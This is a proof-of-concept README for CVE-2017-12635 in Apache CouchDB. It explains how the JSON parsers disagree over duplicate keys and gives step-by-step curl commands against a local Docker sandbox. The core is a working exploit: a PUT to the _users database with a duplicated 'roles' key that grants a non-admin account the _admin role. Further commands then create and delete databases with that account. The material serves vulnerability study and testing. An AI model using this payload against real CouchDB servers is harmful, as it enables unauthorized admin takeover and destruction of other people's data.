# Apache CouchDB 1.7.0 / 2.x < 2.1.1 - CVE-2017-12635 - Remote Privilege Escalation
## Detail
- Apache CouchDB is a document-oriented NoSQL database, implemented in Erlang.
- Due to the discrepancy between the Erlang-based JSON parser and JavaScript-based JSON parser, there was a vulnerability in CouchDB before 1.7.0 and 2.x before 2.1.1 allowing non-admin users to escalate privilege by submitting _users documents with duplicate roles keys used for access control within the databases, including the special case_admin role, that denotes administrative users.
**To recap, the vulnerability allows non-admin users to give themselves admin privileges.**
- CouchDB uses special database (called _users by default) to store information about registered users. This is a system database – this means that while it shares common database API, there are some special security-related constraints applied and used agreements on documents structure.
Only administrators may GET, PUT or DELETE any document in_users database.
Users may only access (GET /_users/org.couchdb.user:\<username>) or modify (PUT /_users/org.couchdb.user:\<username>) documents that they owns.
## Steps to exploit
1. Run docker image:
```docker container run -d --name couchdb-sandbox -p 5984:5984 couchdb:1.6.1```
2. Check sure the CouchDB instance is launched and working
```curl -X GET http://localhost:5984```
3. Query: All databases in the instance
```curl -X GET http://localhost:5984/_all_dbs```
4. Query: Create an admin account with credentials admin:admin
```curl -X PUT http://localhost:5984/_config/admins/admin -d '"admin"'```
5. Query: Try create a new database named *records*
```curl -X PUT http://localhost:5984/records```
We cant create because dont have admin account
6. Query: Create a new database named records with admin authentication
```curl -X PUT http://admin:admin@localhost:5984/records```
7. Query: Create a new document in _users database
```
curl -X PUT http://localhost:5984/_users/org.couchdb.user:guest \
-H "Accept: application/json" \
-H "Content-Type: application/json" \
-d '{"name": "guest", "password": "guest", "roles": ["_admin"], "type": "user"}'
```
We cant create an account with admin role
8. Query: Create a new document in _users database with admin role
```
curl -X PUT http://localhost:5984/_users/org.couchdb.user:guest \
-H "Accept: application/json" \
-H "Content-Type: application/json" \
-d '{"name": "guest", "password": "guest", "roles": ["_admin"], "roles": [], "type": "user"}'
```
we have an admin account now!
9. Query: Create a new database named new_recorDs with guest authentication
```curl -X PUT http://guest:guest@localhost:5984/new_records```
10. Query: Delete the database named new_records with guest authentication
```curl -X DELETE http://guest:guest@localhost:5984/new_records```
[4.0K] /data/pocs/69331d5024ccb37937ab967358497f860c70c2f8
└── [2.9K] README.md
0 directories, 1 file